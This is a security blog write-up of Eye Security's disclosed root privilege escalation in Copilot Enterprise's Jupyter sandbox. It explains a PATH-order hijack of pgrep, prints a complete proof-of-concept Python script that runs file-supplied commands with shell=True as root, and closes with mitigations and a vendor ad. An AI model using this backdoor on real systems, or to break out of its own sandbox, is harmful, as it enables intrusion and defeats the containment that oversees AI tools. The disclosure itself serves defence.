Privileged Path Hijack: Eye Security Exposes Root-Level Vulnerability in Copilot Enterprise
SummaryOn April 18, 2025, Eye Security researchers identified a critical privilege escalation issue in Microsoft Copilot Enterprise’s live Python sandbox (Jupyter Notebook–based). A misconfigured entrypoint script (keepAliveJupyterSvc.sh) ran pgrep without using a full path. Because the $PATH Priori...
SummaryOn April 18, 2025, Eye Security researchers identified a critical privilege escalation issue in Microsoft Copilot Enterprise’s live Python sandbox (Jupyter Notebook–based). A misconfigured entrypoint script (keepAliveJupyterSvc.sh) ran pgrep without using a full path. Because the $PATH Prioritized a writable directory (/app/miniconda/bin) over /usr/bin. An attacker could upload a malicious pgrep script and gain root access inside the container. Microsoft patched the issue on July 25, 2025. No customer data was accessed, and Microsoft classified the flaw as moderate severity and did not issue a bug bounty, although Eye Security was publicly acknowledged.
Technical Breakdown
Vulnerability Details
- April 2025 rollout introduced a Jupyter Notebook sandbox running as “ubuntu” in a Miniconda container.
- The root-privileged script
keepAliveJupyterSvc.shexecutedpgrepwithout specifying/usr/bin/pgrepin a loop every two seconds. - Because
/app/miniconda/bin(writable by attackers) preceded/usr/binin$PATH, a maliciouspgrepcould hijack execution and escalate privileges.
Proof-of-Concept (PoC)
Eye Security researchers successfully exploited this vulnerability by crafting a malicious Python script and disguising it as pgrep. By uploading this script via Copilot, they could execute arbitrary commands with root privileges inside the container.
Malicious pgrep Script
import os
import subprocess
in_file = "/mnt/data/in"
out_file = "/mnt/data/out"
while True:
if os.path.exists(in_file):
with open(in_file, "r") as f:
command = f.read().strip()
os.remove(in_file)
if command:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
with open(out_file, "w") as f:
f.write(output.decode())
if error:
with open(out_file, "a") as f:
f.write("nError:n" + error.decode())The malicious script reads commands from /mnt/data/in, executes them using popen, and writes the output to /mnt/data/out. This technique effectively grants the attacker root access to the container environment.
Impact & MITRE ATT&CK Mapping
- TA0004 Privilege Escalation: Gained root through path hijack.
- TA0002 Execution: Attacker-controlled script executed as root.
- T1068 Exploitation for Privilege Escalation: Misconfigured script enabled elevation.
- T1204 User Execution: Execution occurred via uploaded malicious script.
Post-Exploit Findings
The container’s filesystem was isolated and lacked sensitive host data. No container escape was demonstrated. Eye Security noted potential exposure to Microsoft’s Responsible AI Operations panel and up to 21 internal services via Entra OAuth misuse, though no sensitive data was extracted.
Timeline & Response
Microsoft acknowledged Eye Security in its researcher portal but awarded no monetary bounty despite demonstrating a root-level access exploit.
Mitigation & Security Best Practices
- Always use absolute paths in scripts (e.g.
/usr/bin/pgrep). - Don’t place writable directories early in the
$PATH. - Drop root privileges early, ensuring services run with minimal necessary rights.
- Validate and sandbox user-uploaded scripts thoroughly.
- Implement robust sandbox logging and limit execution environment visibility.
- Adopt security-by-design principles and audit container configurations regularly.
Key Lessons for AI-Driven Sandbox Security
This incident demonstrates that simple misconfigurations, like missing binary paths and writable directories, can undermine strong AI sandbox defensibility. As enterprises integrate AI at scale, combining innovation with strict security hygiene is essential. Fighting complexity without inviting chaos in containerized environments is imperative.
Excerpt for Publication
“Researchers from Eye Security reported the vulnerability to Microsoft on April 18, 2025, and a fix was issued by July 25, 2025. The attack exploited a malicious script in a writable directory and missing binary path enforcement to achieve root access inside the container—but crucially, no customer data was accessed nor host systems breached. Microsoft rated the flaw as moderate severity, issued no bug bounty, and credited Eye Security. Further research hinted at access to up to 21 internal services using Entra OAuth—highlighting how limited sandbox flaws can expose broader surfaces.”
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.
